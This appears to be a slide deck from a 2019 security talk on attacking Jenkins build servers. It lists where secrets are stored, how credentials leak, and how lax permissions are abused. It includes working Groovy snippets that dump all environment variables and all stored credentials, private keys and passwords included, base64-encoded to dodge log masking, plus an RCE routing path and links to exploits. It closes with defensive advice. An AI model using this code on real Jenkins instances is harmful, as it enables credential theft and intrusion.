# Attacking Jenkins Sergej 'winnie' Schmidt  #UnFUCK2019
# Jenkins  * Popular FOSS build scheduler * More just cron jobs on steroids * CI/CD * Huge plugin ecosystem <sub><sup><sub><sup>Logo by Jenkins project (<a rel="nofollow" class="external free" href="http://jenkins-ci.org/">http://jenkins-ci.org/</a>) - <a rel="nofollow" class="external free" href="https://wiki.jenkins-ci.org/display/JENKINS/Logo">https://wiki.jenkins-ci.org/display/JENKINS/Logo</a>, <a href="https://creativecommons.org/licenses/by-sa/3.0" title="Creative Commons Attribution-Share Alike 3.0">CC BY-SA 3.0</a></p> </sup></sub></sup></sub>
# A Build System ### And some threat modeling 
# Credentials Stored in $JENKINS\_HOME * secrets/master.key * secrets/hudson.util.Secret * credentials.xml
# API Tokens * Generated for every user * $JENKINS\_HOME/users/$username/config.xml * Also Encrypted * Since version v2.129, hashed
# Credentials All Over the Place * Environment variables * Creds often injected as env vars * Build ouput * printed accidentally * set -x * Known creds are masked
# Credentials All Over the Place (2) * EnvInject plugin * Discloses env vars * Credentials injected into env vars * Swarm plugin params * \- password * \- passwordEnvVariable * \- passwordFile
# Jenkins Permissions 
# Exploiting Lax Permissions * Admin script console /script * Creating jobs * Editing jobs * Master label == doom
# Custom Code and Build Parameters * Config in build jobs * Jenkinsfile libs or predefine scripts * Command injections!1!!
# Write-Access to Code *CODE* := code + tests + make files
# Write-Access to Code (2) ```groovy defaultTasks 'run' task run { doLast { println 'get all me all the env!' System.getenv().each { k, v -> println "KEY: ${k}, VALUE: ${v}".bytes.encodeBase64().toString() } } } ```
# Write-Access to Jenkinsfile ```groovy def creds = com.cloudbees.plugins.credentials.CredentialsProvider.lookupCredentials( com.cloudbees.plugins.credentials.common.StandardUsernameCredentials.class, Jenkins.instance, null, null ); for (c in creds) { println( ( c.properties.privateKeySource ? "ID: " + c.id + ", UserName: " + c.username + ", Private Key: " + c.getPrivateKey() : "").bytes.encodeBase64().toString()) } for (c in creds) { println( ( c.properties.password ? "ID: " + c.id + ", UserName: " + c.username + ", Password: " + c.password : "").bytes.encodeBase64().toString()) } ``` https://codurance.com/2019/05/30/accessing-and-dumping-jenkins-credentials
# Jenkins \& Patch Management ### Remote RCE with Metaprogramming $JENKINS\_URL/adjuncts/whatever/class/classLoader/resource/index.jsp/content ```java jenkins.model.Jenkins.getAdjuncts("whatever") .getClass() .getClassLoader() .getResource("index.jsp") .getContent() ```
# Jenkins \& Patch Management(2) ### Remote RCE with Metaprogramming ### Details: [Orage Tsai Blog: part1](https://blog.orange.tw/2019/01/hacking-jenkins-part-1-play-with-dynamic-routing.html) [Orage Tsai Blog: part2](https://blog.orange.tw/2019/02/abusing-meta-programming-for-unauthenticated-rce.html) [HITB Amsterdam talk recording](https://www.youtube.com/watch?v=_x8BsBnQPmU) [load 'n lauch exploit](https://packetstormsecurity.com/files/151823/Jenkins-Script-Security-1.49-Declarative-1.3.4-Groovy-2.60-Remote-Code-Execution.html)
# SecOps 101 ### (for Build Systems) Stuff you saw + a very incomplete list * Asset management * <span style="text-decoration:underline;color:red">User/permission/creds management</span> * Network filtering * <span style="text-decoration:underline;color:red">Patch Management</span>